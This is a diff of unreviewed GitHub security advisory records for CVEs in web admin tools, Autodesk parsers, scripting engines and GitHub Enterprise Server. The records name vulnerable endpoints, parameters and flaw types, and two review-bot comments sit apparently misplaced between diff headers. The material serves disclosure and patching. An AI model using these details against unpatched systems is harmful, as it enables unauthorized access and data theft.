@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwrh-w4f9-ffc9", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2665" + ], + "details": "A vulnerability was detected in huanzi-qch base-admin up to 57a8126bb3353a004f3c7722089e3b926ea83596. Impacted is the function Upload of the file SysFileController.java of the component JSP Parser. Performing a manipulation of the argument File results in unrestricted upload. The attack can be initiated remotely. The exploit is now public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2665" + }, + { + "type": "WEB", + "url": "https://github.com/huanzi-qch/base-admin/issues/38" + }, + { + "type": "WEB", + "url": "https://github.com/huanzi-qch/base-admin/issues/38#issue-3905100373" + }, + { + "type": "WEB", + "url": "https://github.com/huanzi-qch/base-admin" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346462" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346462" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753240" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:37Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json b/advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json new file mode 100644 index 0000000000000..cdf2eee5fadeb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h5jq-923c-7w8g", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-0874" + ], + "details": "A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0874" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/products/autodesk-access/overview" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json index b92de6f89b751..4101ee5427854 100644 --- a/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json +++ b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json 
@@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-89" + ], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json b/advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json new file mode 100644 index 0000000000000..a8fca98bcaedc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jx8h-vrjj-cm6g", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2667" + ], + "details": "A vulnerability has been found in Rongzhitong Visual Integrated Command and Dispatch Platform up to 20260206. The impacted element is an unknown function of the file /dispatch/api?cmd=userinfo. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2667" + }, + { + "type": "WEB", + "url": "https://github.com/21151213732/CVE/blob/main/VICDP-Unauthorized%20Access1.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346464" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346464" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753262" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json index 6013449d93966..cfbe14db284a4 100644 --- a/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json 
+++ b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m4v3-95xp-3j5h", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70147" ], "details": "Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests to these endpoints without a valid session.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:36Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json b/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json new file mode 100644 index 0000000000000..ae8435903a1a7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json 
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mjjq-x58m-rfxp",
+ "modified": "2026-02-18T21:31:23Z",
+ "published": "2026-02-18T21:31:23Z",
+ "aliases": [
+ "CVE-2026-2662"
+ ],
+ "details": "A weakness has been identified in FascinatedBox lily up to 2.3. This vulnerability affects the function count_transforms of the file src/lily_emitter.c. This manipulation causes out-of-bounds read. The attack can only be executed locally. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2662"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FascinatedBox/lily/issues/381"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FascinatedBox/lily"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/oneafter/0122/blob/main/i381/repro.lily"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346460"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346460"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753166"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T20:18:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json
new file mode 100644
index 0000000000000..dcb5ba7c92618
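Review bot: `cwe_ids` in this new record carries only the class-level `CWE-119`, while the details text names an out-of-bounds read in `count_transforms`, so anyone filtering or alerting on specific weakness IDs will not match it. The same coarse tagging recurs in the new records for GHSA-pppv-pc54-6j8r (heap-based buffer overflow, also `CWE-119`), GHSA-r9wp-qq53-qvjx (unrestricted upload, `CWE-284`) and GHSA-rwf8-6fj2-4vrx (SQL injection, `CWE-74`). I would add the specific entry next to the existing one in each file: `"CWE-125"` here, then `"CWE-122"`, `"CWE-434"` and `"CWE-89"` in the other three, in that order. If these values are mirrored verbatim from the upstream CVE record, the correction presumably belongs in the sync mapping rather than in the individual files.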
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p546-7whm-cxpm",
+ "modified": "2026-02-18T21:31:23Z",
+ "published": "2026-02-18T21:31:23Z",
+ "aliases": [
+ "CVE-2026-0573"
+ ],
+ "details": "An URL redirection vulnerability was identified in GitHub Enterprise Server that allowed attacker-controlled redirects to leak sensitive authorization tokens. The repository_pages API insecurely followed HTTP redirects when fetching artifact URLs, preserving the authorization header containing a privileged JWT. An authenticated user could redirect these requests to an attacker-controlled domain, exfiltrate the Actions.ManageOrgs JWT, and leverage it for potential remote code execution. Attackers would require access to the target GitHub Enterprise Server instance and the ability to exploit a legacy redirect to an attacker-controlled domain. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.19 and was fixed in versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22. 
This vulnerability was reported via the GitHub Bug Bounty program.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0573"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.22"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.17"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.13"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.10"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-601"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T21:16:22Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json b/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json
new file mode 100644
index 0000000000000..5dbb96038594a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json
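Review bot: The `details` text contradicts itself on the affected range: it says the flaw affected all versions "prior to 3.19" yet lists 3.19.2 among the fixed releases, which implies 3.19.0 and 3.19.1 are affected as well. Because `"affected": []` gives no machine-readable range, this sentence is all an operator has to triage from, and read literally it would clear an unpatched 3.19 instance. Once confirmed against the linked release notes, I would reword it along the lines of `affected all versions prior to 3.19.2 and was fixed in versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22`. The string also appears to carry a stray line-separator character before "This vulnerability was reported", which would be safer as a plain space.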
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pppv-pc54-6j8r", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-2661" + ], + "details": "A security flaw has been discovered in Squirrel up to 3.2. This affects the function SQObjectPtr::operator in the library squirrel/sqobject.h. The manipulation results in heap-based buffer overflow. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2661" + }, + { + "type": "WEB", + "url": "https://github.com/albertodemichelis/squirrel/issues/310" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i310/repro" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753165" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json new file mode 100644 index 0000000000000..300677a04c037 --- /dev/null 
+++ b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json 
@@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrj7-4954-7p6v", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-1999" + ], + "details": "An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to merge their own pull request into a repository without having push access by exploiting an authorization bypass in the enable_auto_merge mutation for pull requests. This issue only affected repositories that allow forking as the attack relies on opening a pull request from an attacker-controlled fork into the target repository. Exploitation was only possible in specific scenarios. It required a clean pull request status and only applied to branches without branch protection rules enabled. This vulnerability affected GitHub Enterprise Server versions prior to 3.19.2, 3.18.5, and 3.17.11, and was fixed in versions 3.19.2, 3.18.5, and 3.17.11. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1999" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.11" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.5" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:24Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json index 7a095742f0820..48a6c66996eda 100644 --- a/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json +++ b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json @@ -42,6 +42,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-352", "CWE-640" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json b/advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json new file mode 100644 index 0000000000000..9b5ed498e2809 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r9wp-qq53-qvjx", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2666" + ], + "details": "A flaw has been found in mingSoft MCMS 6.1.1. The affected element is an unknown function of the file /ms/file/uploadTemplate.do of the component Template Archive Handler. Executing a manipulation of the argument File can lead to unrestricted upload. The attack can be launched remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2666" + }, + { + "type": "WEB", + "url": "https://github.com/chujianxin0101/vuln/issues/11" + }, + { + "type": "WEB", + "url": "https://github.com/chujianxin0101/vuln/issues/11#issue-3905144613" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346463" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346463" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753243" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json b/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json new file mode 100644 index 0000000000000..853829fb4e468 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rcjr-qg8v-4c3v", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-0875" + ], + "details": "A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0875" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/products/autodesk-access/overview" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json b/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json new file mode 100644 index 0000000000000..d1af0c5a66305 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwf8-6fj2-4vrx", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2663" + ], + "details": "A security vulnerability has been detected in Alixhan xh-admin-backend up to 1.7.0. This issue affects some unknown processing of the file /frontend-api/system-service/api/system/role/query of the component Database Query Handler. Such manipulation of the argument prop leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2663" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753225" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json index e88b5b1de3963..60aa9141202ef 100644 --- a/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json +++ b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v3v9-r7ff-976x", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70149" ], "details": "CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:36Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json b/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json new file mode 100644 index 0000000000000..55d2bd16a9b2a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmr8-g4h2-2x5j", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2668" + ], + "details": "A vulnerability was found in Rongzhitong Visual Integrated Command and Dispatch Platform up to 20260206. This affects an unknown function of the file /dm/dispatch/user/add of the component User Handler. The manipulation results in improper access controls. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2668" + }, + { + "type": "WEB", + "url": "https://github.com/21151213732/CVE/blob/main/VICDP-Unauthorized%20Access2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753283" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json b/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json new file mode 100644 index 0000000000000..ab1ae0c19d6e0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json 
